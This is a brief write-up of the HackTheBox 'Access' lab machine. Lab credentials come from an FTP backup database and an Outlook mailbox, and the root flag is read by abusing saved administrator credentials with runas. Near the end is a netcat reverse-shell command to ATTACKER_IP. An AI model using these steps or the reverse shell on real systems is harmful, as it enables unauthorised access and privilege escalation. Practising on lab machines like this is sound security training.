Where Notes Work
ACCESS – HACKTHEBOX
Hello friends, This is a quick write-up of the Access machine from HACKTHEBOX.
Found port 21,80 and 23 open
In ftp found backup.mdb and open it using dbeaver-ce, and found passwords and usernames
$ sudo apt install dbeaver-ce
#when you enumerate for tables, you wil found these creds in one of those.
user: engineer pass: access4u@security
user: backup_admin pass: admin
in ftp there is also a zip file which is encrypted, opened it using above password and found .pst file, which is outlook folder
$ readpst hello.pst
after that open extracted file and found:
Hi there,
The password for the “**security**” account has been changed to **4Cc3ssC0ntr0ller**. Please ensure this is passed on to your engineers.
Logged into user account using telnet
after long enumeration found administrator creds is save
cmdkey /list
now reading root.txt using administrator creds
runas.exe /savedcred /user:administrator "cmd /c type C:\\users\\administrator\\desktop\\root.txt > C:\\users\\security\\desktop\\root.txt"
You can also get using nc.exe, first upload nc.exe to victim machine, for example, uploaded nc.exe on the path “C:\Users\security\nc.exe”
runas.exe /savedcred /user:administrator "cmd /c C:\users\security\nc.exe -e cmd.exe ATTACKER_IP ATTACKER_PORT"
If you face any problems, let me know in the comment section.